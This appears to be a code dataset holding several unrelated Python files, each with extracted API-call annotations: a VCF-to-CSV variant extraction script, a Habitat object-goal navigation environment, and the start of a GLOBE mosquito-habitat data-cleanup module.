] | [((1079, 1094), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1092, 1094), False, 'import torch\n'), ((2944, 2959), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2957, 2959), False, 'import torch\n'), ((2208, 2245), 'torch.is_floating_point', 'torch.is_floating_point', (['reduced_grad'], {}), '(reduced_grad)\n', (2231, 2245), False, 'import torch\n'), ((2909, 2936), 'torch.cuda.current_stream', 'torch.cuda.current_stream', ([], {}), '()\n', (2934, 2936), False, 'import torch\n'), ((3148, 3167), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (3160, 3167), False, 'import torch\n')] |
#!/usr/bin/env python3
import argparse
import csv
from typing import List
from cyvcf2 import VCF
def main():
args = parse_arguments()
# load all variants
variants = []
with open(args.inputs) as f:
reader = csv.DictReader(f)
for row in reader:
variants += get_records(
vcf_path=row["file"],
sample_name=row["name"],
group=row["group"],
no_alt=args.no_alt,
autosomes_only=args.autosomes_only,
)
# write csv
columns = ["sample", "group", "chrom", "pos", "ref", "alt"]
with open(args.output, "w") as f:
writer = csv.DictWriter(f, fieldnames=columns)
writer.writeheader()
writer.writerows(variants)
def get_records(
vcf_path: str,
sample_name: str,
group: str,
no_alt: bool = False,
autosomes_only: bool = True,
) -> List[dict]:
"""
Load records from VCF and create a list of dictionaries with their relevant info
"""
hs_autosomes = [str(x) for x in range(1, 23)]
hs_standard = hs_autosomes + ["X", "Y"]
records = []
for variant in VCF(vcf_path):
chrom_ncbi = variant.CHROM.replace("chr", "")
if (no_alt and chrom_ncbi not in hs_standard) or (
autosomes_only and chrom_ncbi not in hs_autosomes
):
continue
record = {
"sample": sample_name,
"group": group,
"chrom": variant.CHROM,
"pos": variant.POS,
"ref": variant.REF,
"alt": variant.ALT[0],
}
records.append(record)
return records
def parse_arguments():
parser = argparse.ArgumentParser(
description="Reads a set of VCF files and creates list with the variants"
)
parser.add_argument(
"--inputs",
"-i",
required=True,
help="list containing VCF files to be processed (CSV file with columns name,group,file)",
)
parser.add_argument(
"--no-alt",
"-n",
action="store_true",
help="ignore variant from alternate sequences",
dest="no_alt",
)
parser.add_argument(
"--autosomes-only",
"-a",
action="store_true",
        help="keep only variants from autosomes (1-22), implies --no-alt",
dest="autosomes_only",
)
parser.add_argument("--output", "-o", required=True, help="output CSV file")
return parser.parse_args()
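# Illustrative usage, not part of the original script; the script name, file
# paths, sample names and groups below are made-up placeholders.
#
# inputs.csv:
#     name,group,file
#     sampleA,case,/path/to/sampleA.vcf.gz
#     sampleB,control,/path/to/sampleB.vcf.gz
#
# Example invocation, restricted to autosomes, writing one row per variant:
#     python extract_variants.py --inputs inputs.csv --autosomes-only --output variants.csv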
if __name__ == "__main__":
main()
| [
"csv.DictWriter",
"cyvcf2.VCF",
"csv.DictReader",
"argparse.ArgumentParser"
] | [((1155, 1168), 'cyvcf2.VCF', 'VCF', (['vcf_path'], {}), '(vcf_path)\n', (1158, 1168), False, 'from cyvcf2 import VCF\n'), ((1695, 1798), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Reads a set of VCF files and creates list with the variants"""'}), "(description=\n 'Reads a set of VCF files and creates list with the variants')\n", (1718, 1798), False, 'import argparse\n'), ((234, 251), 'csv.DictReader', 'csv.DictReader', (['f'], {}), '(f)\n', (248, 251), False, 'import csv\n'), ((669, 706), 'csv.DictWriter', 'csv.DictWriter', (['f'], {'fieldnames': 'columns'}), '(f, fieldnames=columns)\n', (683, 706), False, 'import csv\n')] |
import json
import bz2
import gzip
import _pickle as cPickle
import gym
import numpy as np
import quaternion
import skimage.morphology
import habitat
from envs.utils.fmm_planner import FMMPlanner
from constants import coco_categories
import envs.utils.pose as pu
class ObjectGoal_Env(habitat.RLEnv):
"""The Object Goal Navigation environment class. The class is responsible
for loading the dataset, generating episodes, and computing evaluation
metrics.
"""
def __init__(self, args, rank, config_env, dataset):
self.args = args
self.rank = rank
super().__init__(config_env, dataset)
# Loading dataset info file
self.split = config_env.DATASET.SPLIT
self.episodes_dir = config_env.DATASET.EPISODES_DIR.format(
split=self.split)
if args.custom_eps:
with open("{}/train_episode_data.json".format(args.custom_eps), 'r') as f:
episodes_all = json.load(f)
self.episodes_all = {}
for ep in episodes_all:
if ep["scene"] in self.episodes_all:
self.episodes_all[ep["scene"]].append(ep)
else:
self.episodes_all[ep["scene"]] = [ep]
dataset_info_file = self.episodes_dir + \
"{split}_info.pbz2".format(split=self.split)
with bz2.BZ2File(dataset_info_file, 'rb') as f:
self.dataset_info = cPickle.load(f)
# Specifying action and observation space
self.action_space = gym.spaces.Discrete(3)
self.observation_space = gym.spaces.Box(0, 255,
(3, args.frame_height,
args.frame_width),
dtype='uint8')
# Initializations
self.episode_no = 0
# Scene info
self.last_scene_path = None
self.scene_path = None
self.scene_name = None
# Episode Dataset info
self.eps_data = None
self.eps_data_idx = None
self.gen_ep_idx = 1
self.gt_planner = None
self.object_boundary = None
self.goal_idx = None
self.goal_name = None
self.map_obj_origin = None
self.starting_loc = None
self.starting_distance = None
if args.eval and args.shuffle:
self.shuffled_indices = np.arange(args.num_eval_episodes)
np.random.shuffle(self.shuffled_indices)
# Episode tracking info
self.curr_distance = None
self.prev_distance = None
self.timestep = None
self.stopped = None
self.path_length = None
self.last_sim_location = None
self.trajectory_states = []
self.info = {}
self.info['distance_to_goal'] = None
self.info['spl'] = None
self.info['success'] = None
def load_new_episode(self):
"""The function loads a fixed episode from the episode dataset. This
function is used for evaluating a trained model on the val split.
"""
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
if self.scene_path != self.last_scene_path:
if not args.testset:
episodes_file = self.episodes_dir + \
"content/{}_episodes.json.gz".format(scene_name)
print("Loading episodes from: {}".format(episodes_file))
with gzip.open(episodes_file, 'r') as f:
self.eps_data = json.loads(
f.read().decode('utf-8'))["episodes"]
else:
episodes_file = self.episodes_dir + \
"content/{}_test_episodes.json".format(scene_name)
print("Loading episodes from: {}".format(episodes_file))
with open(episodes_file, 'r') as f:
self.eps_data = json.load(f)
self.eps_data_idx = 0
self.last_scene_path = self.scene_path
# Load episode info
if self.args.shuffle:
episode = self.eps_data[self.shuffled_indices[self.eps_data_idx]]
else:
episode = self.eps_data[self.eps_data_idx]
self.info["episode_data"] = episode
self.eps_data_idx += 1
self.eps_data_idx = self.eps_data_idx % len(self.eps_data)
pos = episode["start_position"]
rot = quaternion.from_float_array(episode["start_rotation"])
goal_name = episode["object_category"]
goal_idx = episode["object_id"]
floor_idx = episode["floor_id"]
# Load scene info
scene_info = self.dataset_info[scene_name]
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
# Setup ground truth planner
object_boundary = args.success_dist
map_resolution = args.map_resolution
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
# Get starting loc in GT map coordinates
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc]\
/ 20.0 + self.object_boundary
self.info["episode_data"]["shortest_dist"] = self.starting_distance
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = rot
self.info["scene"] = scene_name
self.info["floor_idx"] = floor_idx
# The following two should match approximately
#print(self.starting_loc)
#print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def load_incomplete_episode(self):
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
if self.scene_path != self.last_scene_path:
print("Loading episodes from: {}".format(scene_name))
self.eps_data_idx = 0
self.last_scene_path = self.scene_path
episode = self.episodes_all[scene_name][self.eps_data_idx]
self.info["episode_data"] = episode
self.eps_data_idx += 1
self.eps_data_idx = self.eps_data_idx % len(self.episodes_all[scene_name])
pos = episode["sim_pos"]
rot = quaternion.from_rotation_vector(episode["sim_rot"])
goal_name = episode["goal_name"]
goal_idx = episode["goal_cat_id"]
floor_idx = episode["floor_idx"]
# Load scene info
scene_info = self.dataset_info[scene_name]
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
# Setup ground truth planner
object_boundary = args.success_dist
map_resolution = args.map_resolution
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
# Get starting loc in GT map coordinates
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc]\
/ 20.0 + self.object_boundary
self.info["episode_data"]["shortest_dist"] = self.starting_distance
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = rot
# The following two should match approximately
#print(self.starting_loc)
#print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def generate_new_episode(self):
"""The function generates a random valid episode. This function is used
for training a model on the train split.
"""
args = self.args
self.scene_path = self.habitat_env.sim.config.SCENE
scene_name = self.scene_path.split("/")[-1].split(".")[0]
scene_info = self.dataset_info[scene_name]
map_resolution = args.map_resolution
floor_idx = np.random.randint(len(scene_info.keys()))
floor_height = scene_info[floor_idx]['floor_height']
sem_map = scene_info[floor_idx]['sem_map']
map_obj_origin = scene_info[floor_idx]['origin']
cat_counts = sem_map.sum(2).sum(1)
possible_cats = list(np.arange(6))
for i in range(6):
if cat_counts[i + 1] == 0:
possible_cats.remove(i)
object_boundary = args.success_dist
loc_found = False
while not loc_found:
            if len(possible_cats) == 0:
                raise RuntimeError(
                    "No valid objects for {}".format(floor_height))
goal_idx = np.random.choice(possible_cats)
for key, value in coco_categories.items():
if value == goal_idx:
goal_name = key
selem = skimage.morphology.disk(2)
traversible = skimage.morphology.binary_dilation(
sem_map[0], selem) != True
traversible = 1 - traversible
planner = FMMPlanner(traversible)
selem = skimage.morphology.disk(
int(object_boundary * 100. / map_resolution))
goal_map = skimage.morphology.binary_dilation(
sem_map[goal_idx + 1], selem) != True
goal_map = 1 - goal_map
planner.set_multi_goal(goal_map)
m1 = sem_map[0] > 0
m2 = planner.fmm_dist > (args.min_d - object_boundary) * 20.0
m3 = planner.fmm_dist < (args.max_d - object_boundary) * 20.0
possible_starting_locs = np.logical_and(m1, m2)
possible_starting_locs = np.logical_and(
possible_starting_locs, m3) * 1.
if possible_starting_locs.sum() != 0:
loc_found = True
else:
print("Invalid object: {} / {} / {}".format(
scene_name, floor_height, goal_name))
possible_cats.remove(goal_idx)
scene_info[floor_idx]["sem_map"][goal_idx + 1, :, :] = 0.
self.dataset_info[scene_name][floor_idx][
"sem_map"][goal_idx + 1, :, :] = 0.
loc_found = False
while not loc_found:
pos = self._env.sim.sample_navigable_point()
x = -pos[2]
y = -pos[0]
min_x, min_y = map_obj_origin / 100.0
map_loc = int((-y - min_y) * 20.), int((-x - min_x) * 20.)
if abs(pos[1] - floor_height) < args.floor_thr / 100.0 and \
possible_starting_locs[map_loc[0], map_loc[1]] == 1:
loc_found = True
agent_state = self._env.sim.get_agent_state(0)
rotation = agent_state.rotation
rvec = quaternion.as_rotation_vector(rotation)
rvec[1] = np.random.rand() * 2 * np.pi
rot = quaternion.from_rotation_vector(rvec)
self.gt_planner = planner
self.starting_loc = map_loc
self.object_boundary = object_boundary
self.goal_idx = goal_idx
self.goal_name = goal_name
self.map_obj_origin = map_obj_origin
self.starting_distance = self.gt_planner.fmm_dist[self.starting_loc] \
/ 20.0 + self.object_boundary
self.prev_distance = self.starting_distance
self._env.sim.set_agent_state(pos, rot)
self.info["sim_pos"] = pos
self.info["sim_rot"] = quaternion.as_float_array(rot)
self.info["episode_id"] = self.gen_ep_idx
self.gen_ep_idx += 1
self.info["scene"] = scene_name
self.info["floor_idx"] = floor_idx
self.info["goal_name"] = goal_name
# The following two should match approximately
# print(starting_loc)
# print(self.sim_continuous_to_sim_map(self.get_sim_location()))
self.info['gt_pos'] = self.sim_continuous_to_sim_map(self.get_sim_location())
obs = self._env.sim.get_observations_at(pos, rot)
return obs
def sim_map_to_sim_continuous(self, coords):
"""Converts ground-truth 2D Map coordinates to absolute Habitat
simulator position and rotation.
"""
agent_state = self._env.sim.get_agent_state(0)
y, x = coords
min_x, min_y = self.map_obj_origin / 100.0
cont_x = x / 20. + min_x
cont_y = y / 20. + min_y
agent_state.position[0] = cont_y
agent_state.position[2] = cont_x
rotation = agent_state.rotation
rvec = quaternion.as_rotation_vector(rotation)
if self.args.train_single_eps:
rvec[1] = 0.0
else:
rvec[1] = np.random.rand() * 2 * np.pi
rot = quaternion.from_rotation_vector(rvec)
return agent_state.position, rot
def sim_continuous_to_sim_map(self, sim_loc):
"""Converts absolute Habitat simulator pose to ground-truth 2D Map
coordinates.
"""
x, y, o = sim_loc
min_x, min_y = self.map_obj_origin / 100.0
x, y = int((-x - min_x) * 20.), int((-y - min_y) * 20.)
o = np.rad2deg(o) + 180.0
return y, x, o
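    # Worked example with illustrative numbers (not taken from any dataset):
    # with map_obj_origin == [-1000, -1200] (cm) the map origin in metres is
    # (min_x, min_y) == (-10.0, -12.0).  A simulator pose (x, y, o) ==
    # (2.5, -3.0, pi/2) then lands at row int((3.0 + 12.0) * 20) == 300 and
    # column int((-2.5 + 10.0) * 20) == 150 with heading 90 + 180 == 270 deg,
    # so sim_continuous_to_sim_map returns (300, 150, 270.0) at the map's
    # 5 cm (20 cells per metre) resolution.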
def reset(self):
"""Resets the environment to a new episode.
Returns:
obs (ndarray): RGBD observations (4 x H x W)
info (dict): contains timestep, pose, goal category and
evaluation metric info
"""
args = self.args
new_scene = self.episode_no % args.num_train_episodes == 0
self.episode_no += 1
# Initializations
self.timestep = 0
self.stopped = False
self.path_length = 1e-5
self.trajectory_states = []
if new_scene:
obs = super().reset()
self.scene_name = self.habitat_env.sim.config.SCENE
print("Changing scene: {}/{}".format(self.rank, self.scene_name))
self.scene_path = self.habitat_env.sim.config.SCENE
if args.gen_episode:
obs = self.generate_new_episode()
elif args.custom_eps:
obs = self.load_incomplete_episode()
elif self.split == "val":
obs = self.load_new_episode()
else:
obs = self.generate_new_episode()
rgb = obs['rgb'].astype(np.uint8)
depth = obs['depth']
state = np.concatenate((rgb, depth), axis=2).transpose(2, 0, 1)
self.last_sim_location = self.get_sim_location()
# Set info
self.info['time'] = self.timestep
self.info['sensor_pose'] = [0., 0., 0.]
self.info['goal_cat_id'] = self.goal_idx
self.info['goal_name'] = self.goal_name
return state, self.info
def step(self, action):
"""Function to take an action in the environment.
Args:
action (dict):
dict with following keys:
'action' (int): 0: stop, 1: forward, 2: left, 3: right
Returns:
obs (ndarray): RGBD observations (4 x H x W)
reward (float): amount of reward returned after previous action
done (bool): whether the episode has ended
info (dict): contains timestep, pose, goal category and
evaluation metric info
"""
action = action["action"]
if action == 0:
self.stopped = True
# Not sending stop to simulator, resetting manually
action = 3
obs, rew, done, _ = super().step(action)
# Get pose change
dx, dy, do = self.get_pose_change()
self.info['sensor_pose'] = [dx, dy, do]
self.path_length += pu.get_l2_distance(0, dx, 0, dy)
spl, success, dist = 0., 0., 0.
if done:
spl, success, dist = self.get_metrics()
self.info['distance_to_goal'] = dist
self.info['spl'] = spl
self.info['success'] = success
rgb = obs['rgb'].astype(np.uint8)
depth = obs['depth']
state = np.concatenate((rgb, depth), axis=2).transpose(2, 0, 1)
self.timestep += 1
self.info['time'] = self.timestep
return state, rew, done, self.info
def get_reward_range(self):
"""This function is not used, Habitat-RLEnv requires this function"""
return (0., 1.0)
def get_reward(self, observations):
curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())
self.curr_distance = self.gt_planner.fmm_dist[curr_loc[0],
curr_loc[1]] / 20.0
reward = (self.prev_distance - self.curr_distance) * \
self.args.reward_coeff
self.prev_distance = self.curr_distance
return reward
def get_metrics(self):
"""This function computes evaluation metrics for the Object Goal task
Returns:
spl (float): Success weighted by Path Length
(See https://arxiv.org/pdf/1807.06757.pdf)
success (int): 0: Failure, 1: Successful
dist (float): Distance to Success (DTS), distance of the agent
from the success threshold boundary in meters.
(See https://arxiv.org/pdf/2007.00643.pdf)
"""
curr_loc = self.sim_continuous_to_sim_map(self.get_sim_location())
dist = self.gt_planner.fmm_dist[curr_loc[0], curr_loc[1]] / 20.0
if dist == 0.0:
success = 1
else:
success = 0
spl = min(success * self.starting_distance / self.path_length, 1)
return spl, success, dist
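    # Worked example with illustrative numbers: if the shortest feasible path
    # (self.starting_distance) is 4.0 m and the agent travelled a path_length
    # of 5.0 m before stopping inside the success radius (dist == 0.0), then
    # success == 1 and spl == min(1 * 4.0 / 5.0, 1) == 0.8.  Stopping 1.5 m
    # short instead yields dist == 1.5, success == 0 and spl == 0.0.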
def get_done(self, observations):
if self.info['time'] >= self.args.max_episode_length - 1:
done = True
elif self.stopped:
done = True
else:
done = False
return done
def get_info(self, observations):
"""This function is not used, Habitat-RLEnv requires this function"""
info = {}
return info
def get_spaces(self):
"""Returns observation and action spaces for the ObjectGoal task."""
return self.observation_space, self.action_space
def get_sim_location(self):
"""Returns x, y, o pose of the agent in the Habitat simulator."""
agent_state = super().habitat_env.sim.get_agent_state(0)
x = -agent_state.position[2]
y = -agent_state.position[0]
axis = quaternion.as_euler_angles(agent_state.rotation)[0]
if (axis % (2 * np.pi)) < 0.1 or (axis %
(2 * np.pi)) > 2 * np.pi - 0.1:
o = quaternion.as_euler_angles(agent_state.rotation)[1]
else:
o = 2 * np.pi - quaternion.as_euler_angles(agent_state.rotation)[1]
if o > np.pi:
o -= 2 * np.pi
return x, y, o
def get_pose_change(self):
"""Returns dx, dy, do pose change of the agent relative to the last
timestep."""
curr_sim_pose = self.get_sim_location()
dx, dy, do = pu.get_rel_pose_change(
curr_sim_pose, self.last_sim_location)
self.last_sim_location = curr_sim_pose
return dx, dy, do
| [
"quaternion.as_rotation_vector",
"quaternion.as_float_array",
"envs.utils.fmm_planner.FMMPlanner",
"numpy.random.rand",
"gzip.open",
"envs.utils.pose.get_l2_distance",
"numpy.arange",
"_pickle.load",
"bz2.BZ2File",
"numpy.concatenate",
"constants.coco_categories.items",
"numpy.rad2deg",
"qua... | [((1554, 1576), 'gym.spaces.Discrete', 'gym.spaces.Discrete', (['(3)'], {}), '(3)\n', (1573, 1576), False, 'import gym\n'), ((1611, 1690), 'gym.spaces.Box', 'gym.spaces.Box', (['(0)', '(255)', '(3, args.frame_height, args.frame_width)'], {'dtype': '"""uint8"""'}), "(0, 255, (3, args.frame_height, args.frame_width), dtype='uint8')\n", (1625, 1690), False, 'import gym\n'), ((4531, 4585), 'quaternion.from_float_array', 'quaternion.from_float_array', (["episode['start_rotation']"], {}), "(episode['start_rotation'])\n", (4558, 4585), False, 'import quaternion\n'), ((5223, 5246), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (5233, 5246), False, 'from envs.utils.fmm_planner import FMMPlanner\n'), ((7404, 7455), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (["episode['sim_rot']"], {}), "(episode['sim_rot'])\n", (7435, 7455), False, 'import quaternion\n'), ((8090, 8113), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (8100, 8113), False, 'from envs.utils.fmm_planner import FMMPlanner\n'), ((12741, 12780), 'quaternion.as_rotation_vector', 'quaternion.as_rotation_vector', (['rotation'], {}), '(rotation)\n', (12770, 12780), False, 'import quaternion\n'), ((12842, 12879), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (['rvec'], {}), '(rvec)\n', (12873, 12879), False, 'import quaternion\n'), ((13400, 13430), 'quaternion.as_float_array', 'quaternion.as_float_array', (['rot'], {}), '(rot)\n', (13425, 13430), False, 'import quaternion\n'), ((14469, 14508), 'quaternion.as_rotation_vector', 'quaternion.as_rotation_vector', (['rotation'], {}), '(rotation)\n', (14498, 14508), False, 'import quaternion\n'), ((14654, 14691), 'quaternion.from_rotation_vector', 'quaternion.from_rotation_vector', (['rvec'], {}), '(rvec)\n', (14685, 14691), False, 'import quaternion\n'), ((17587, 17619), 'envs.utils.pose.get_l2_distance', 'pu.get_l2_distance', (['(0)', 'dx', '(0)', 'dy'], {}), '(0, dx, 0, dy)\n', (17605, 17619), True, 'import envs.utils.pose as pu\n'), ((20971, 21032), 'envs.utils.pose.get_rel_pose_change', 'pu.get_rel_pose_change', (['curr_sim_pose', 'self.last_sim_location'], {}), '(curr_sim_pose, self.last_sim_location)\n', (20993, 21032), True, 'import envs.utils.pose as pu\n'), ((1384, 1420), 'bz2.BZ2File', 'bz2.BZ2File', (['dataset_info_file', '"""rb"""'], {}), "(dataset_info_file, 'rb')\n", (1395, 1420), False, 'import bz2\n'), ((1459, 1474), '_pickle.load', 'cPickle.load', (['f'], {}), '(f)\n', (1471, 1474), True, 'import _pickle as cPickle\n'), ((2440, 2473), 'numpy.arange', 'np.arange', (['args.num_eval_episodes'], {}), '(args.num_eval_episodes)\n', (2449, 2473), True, 'import numpy as np\n'), ((2486, 2526), 'numpy.random.shuffle', 'np.random.shuffle', (['self.shuffled_indices'], {}), '(self.shuffled_indices)\n', (2503, 2526), True, 'import numpy as np\n'), ((10252, 10264), 'numpy.arange', 'np.arange', (['(6)'], {}), '(6)\n', (10261, 10264), True, 'import numpy as np\n'), ((10663, 10694), 'numpy.random.choice', 'np.random.choice', (['possible_cats'], {}), '(possible_cats)\n', (10679, 10694), True, 'import numpy as np\n'), ((10726, 10749), 'constants.coco_categories.items', 'coco_categories.items', ([], {}), '()\n', (10747, 10749), False, 'from constants import coco_categories\n'), ((11043, 11066), 'envs.utils.fmm_planner.FMMPlanner', 'FMMPlanner', (['traversible'], {}), '(traversible)\n', (11053, 11066), False, 'from envs.utils.fmm_planner import 
FMMPlanner\n'), ((11589, 11611), 'numpy.logical_and', 'np.logical_and', (['m1', 'm2'], {}), '(m1, m2)\n', (11603, 11611), True, 'import numpy as np\n'), ((15047, 15060), 'numpy.rad2deg', 'np.rad2deg', (['o'], {}), '(o)\n', (15057, 15060), True, 'import numpy as np\n'), ((20364, 20412), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20390, 20412), False, 'import quaternion\n'), ((960, 972), 'json.load', 'json.load', (['f'], {}), '(f)\n', (969, 972), False, 'import json\n'), ((11649, 11691), 'numpy.logical_and', 'np.logical_and', (['possible_starting_locs', 'm3'], {}), '(possible_starting_locs, m3)\n', (11663, 11691), True, 'import numpy as np\n'), ((12799, 12815), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (12813, 12815), True, 'import numpy as np\n'), ((16280, 16316), 'numpy.concatenate', 'np.concatenate', (['(rgb, depth)'], {'axis': '(2)'}), '((rgb, depth), axis=2)\n', (16294, 16316), True, 'import numpy as np\n'), ((17945, 17981), 'numpy.concatenate', 'np.concatenate', (['(rgb, depth)'], {'axis': '(2)'}), '((rgb, depth), axis=2)\n', (17959, 17981), True, 'import numpy as np\n'), ((20555, 20603), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20581, 20603), False, 'import quaternion\n'), ((3579, 3608), 'gzip.open', 'gzip.open', (['episodes_file', '"""r"""'], {}), "(episodes_file, 'r')\n", (3588, 3608), False, 'import gzip\n'), ((4030, 4042), 'json.load', 'json.load', (['f'], {}), '(f)\n', (4039, 4042), False, 'import json\n'), ((14611, 14627), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (14625, 14627), True, 'import numpy as np\n'), ((20649, 20697), 'quaternion.as_euler_angles', 'quaternion.as_euler_angles', (['agent_state.rotation'], {}), '(agent_state.rotation)\n', (20675, 20697), False, 'import quaternion\n')] |
import math
import re
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from go_utils.cleanup import ( # isort: skip
rename_latlon_cols,
replace_column_prefix,
round_cols,
standardize_null_vals,
)
from go_utils.plot import ( # isort: skip
completeness_histogram,
plot_freq_bar,
plot_int_distribution,
)
__doc__ = r"""
## Mosquito Specific Cleanup Procedures
### Converting Larvae Data to Integers
Larvae Data is stored as a string in the raw GLOBE Observer dataset. To facilitate analysis, [this method](#larvae_to_num) converts this data to numerical data.
It needs to account for 4 types of data:
1. Regular Data: Converts it to a number
2. Extraneously large data ($\geq 100$ as its hard to count more than that amount accurately): To maintain the information from that entry, the `LarvaeCountMagnitude` flag is used to indicate the real value
3. Ranges (e.g. "25-50"): Chooses the lower bound and set the `LarvaeCountIsRangeFlag` to true.
4. Null Values: Sets null values to $-9999$
It generates the following flags:
- `LarvaeCountMagnitude`: The integer flag contains the order of magnitude (0-4) by which the larvae count exceeds the maximum Larvae Count of 100. This is calculated by $1 + \lfloor \log{\frac{num}{100}} \rfloor$. As a result:
- `0`: Corresponds to a Larvae Count $\leq 100$
- `1`: Corresponds to a Larvae Count between $100$ and $999$
- `2`: Corresponds to a Larvae Count between $1000$ and $9999$
- `3`: Corresponds to a Larvae Count between $10,000$ and $99,999$
- `4`: Corresponds to a Larvae Count $\geq 100,000$
- `LarvaeCountIsRange`: Either a $1$ which indicates the entry was a range (e.g. 25-50) or $0$ which indicates the entry wasn't a range.
Additionally, there were extremely large values that Python was unable to process (`1e+27`) and so there was an initial preprocessing step to set those numbers to 100000 (which corresponds to the maximum magnitude flag).
"""
def cleanup_column_prefix(df, inplace=False):
"""Method for shortening raw mosquito habitat mapper column names.
Parameters
----------
df : pd.DataFrame
The DataFrame containing raw mosquito habitat mapper data.
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame or None
A DataFrame with the cleaned up column prefixes. If `inplace=True` it returns None.
"""
return replace_column_prefix(df, "mosquitohabitatmapper", "mhm", inplace=inplace)
def _entry_to_num(entry):
try:
if entry == "more than 100":
return 101, 1, 1
if pd.isna(entry):
return -9999, 0, 0
elif float(entry) > 100:
return 101, min(math.floor(math.log10(float(entry) / 100)) + 1, 4), 0
return float(entry), 0, 0
except ValueError:
return float(re.sub(r"-.*", "", entry)), 0, 1
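# Worked examples of _entry_to_num's behaviour (inputs chosen for illustration):
#   _entry_to_num("2")             -> (2.0, 0, 0)     ordinary count
#   _entry_to_num("250")           -> (101, 1, 0)     capped at 101, magnitude 1 (100-999)
#   _entry_to_num("25-50")         -> (25.0, 0, 1)    lower bound of the range, range flag set
#   _entry_to_num("more than 100") -> (101, 1, 1)
#   _entry_to_num(float("nan"))    -> (-9999, 0, 0)   null sentinel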
def larvae_to_num(
mhm_df,
larvae_count_col="mhm_LarvaeCount",
magnitude="mhm_LarvaeCountMagnitude",
range_flag="mhm_LarvaeCountIsRangeFlag",
inplace=False,
):
"""Converts the Larvae Count of the Mosquito Habitat Mapper Dataset from being stored as a string to integers.
See [here](#converting-larvae-data-to-integers) for more information.
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame of Mosquito Habitat Mapper data that needs the larvae counts to be set to numbers
larvae_count_col : str, default="mhm_LarvaeCount"
The name of the column storing the larvae count. **Note**: The columns will be output in the format: `prefix_ColumnName` where `prefix` is all the characters that preceed the words `LarvaeCount` in the specified name.
magnitude: str, default="mhm_LarvaeCountMagnitude"
The name of the column which will store the generated LarvaeCountMagnitude output
range_flag : str, default="mhm_LarvaeCountIsRangeFlag"
The name of the column which will store the generated LarvaeCountIsRange flag
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the larvae count as integers. If `inplace=True` it returns None.
"""
if not inplace:
mhm_df = mhm_df.copy()
# Preprocessing step to remove extremely erroneous values
for i in mhm_df.index:
count = mhm_df[larvae_count_col][i]
if not pd.isna(count) and type(count) is str and "e+" in count:
mhm_df.at[i, larvae_count_col] = "100000"
larvae_conversion = np.vectorize(_entry_to_num)
(
mhm_df[larvae_count_col],
mhm_df[magnitude],
mhm_df[range_flag],
) = larvae_conversion(mhm_df[larvae_count_col].to_numpy())
if not inplace:
return mhm_df
def has_genus_flag(df, genus_col="mhm_Genus", bit_col="mhm_HasGenus", inplace=False):
"""
Creates a bit flag: `mhm_HasGenus` where 1 denotes a recorded Genus and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
genus_col : str, default="mhm_Genus"
The name of the column in the mosquito habitat mapper DataFrame that contains the genus records.
bit_col : str, default="mhm_HasGenus"
